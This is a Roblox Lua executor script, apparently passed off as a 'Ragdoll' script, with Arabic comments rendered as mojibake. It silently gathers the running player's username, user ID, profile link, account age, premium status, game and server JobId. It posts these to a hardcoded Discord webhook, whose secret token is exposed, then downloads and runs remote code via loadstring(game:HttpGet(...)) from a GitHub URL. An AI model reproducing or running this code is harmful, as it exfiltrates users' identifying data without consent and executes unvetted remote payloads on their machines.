local webhook = "https://discord.com/api/webhooks/1206721730735898656/UQmjLf2TRd52ZJgHOEJTAGcnDiwn4C2U1xiAEg6sO7GG5oJ5_wxCAs78uNNwQhV1Rea0"

-- Define the PlaceId variable
local PlaceId = game.PlaceId

-- Get the game name and game URL
-- ط§ط³ظ… ظ…ط§ط¨
local gameName = game:GetService("MarketplaceService"):GetProductInfo(PlaceId).Name
-- ط±ط§ط¨ط· ظ„ط¹ط¨ظ‡
local gameUrl = "https://www.roblox.com/games/" .. PlaceId
-- ط±ط§ط¨ط· ط¨ط±ظˆظپط§ظٹظ„
local profileUrl = "https://www.roblox.com/users/" .. game:GetService("Players").LocalPlayer.UserId .. "/profile"
-- ط¹ط¯ط¯ ط³ظٹط±ظپط±
local playerCount = #game:GetService("Players"):GetPlayers()
-- ط¨ط±ظٹظ…ظٹظ…
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local hasPremium = player.MembershipType == Enum.MembershipType.Premium
-- ظˆظ‚طھ ط­ط§ظ„ظٹط§
local time = os.time()
local date = os.date("*t", time)

local hour = math.floor(date.hour)
local min = math.floor(date.min)
local sec = math.floor(date.sec)

-- Create a JSON object to send to the webhook
local data = {
    ["content"] = "",
    ["username"] = "By : 7yd7",
    ["embeds"] = {
        {
            ["title"] = "",
            ["description"] = ""
            .. "**Player Name:**  ```" .. game:GetService("Players").LocalPlayer.Name .. " ```\n"
            .. "**Player ID:** ```" .. game:GetService("Players").LocalPlayer.UserId .. "```\n"
            .. "**Player URL:** ```" .. profileUrl .. "```\n"
            .. "**Game Name:** ```" .. gameName .. "```\n"
            .. "**Game URL:** ```" .. gameUrl .. "```\n"
            .. "**Server JobId :** ```" .. game.JobId .. "```\n"
            .. "**Server Number players online :** ```" .. playerCount .. "```\n"
            .. "**Account Age :** ```" .. game:GetService("Players").LocalPlayer.AccountAge .. "``` \n" 
            .. "**Player Premium :** " .. if hasPremium then "```yes```" else "```no```"  .. "\n"
            .. date.day .. "/" .. date.month .. "/" .. date.year .. " " .. hour .. ":" .. min .. ":" .. sec .. "" .. "\n"
        }
    }
}

-- Send the data to the webhook
local HS = game:GetService("HttpService"):JSONEncode(data)
local headers = {
    ["content-type"] = "application/json"
}

local data2 = {
    Url = webhook,
    Body = HS,
    Method = "POST",
    Headers = headers
}

request(data2)
loadstring(game:HttpGet("https://raw.githubusercontent.com/VR7ss/VR7/main/Ragdoll-VR7"))()
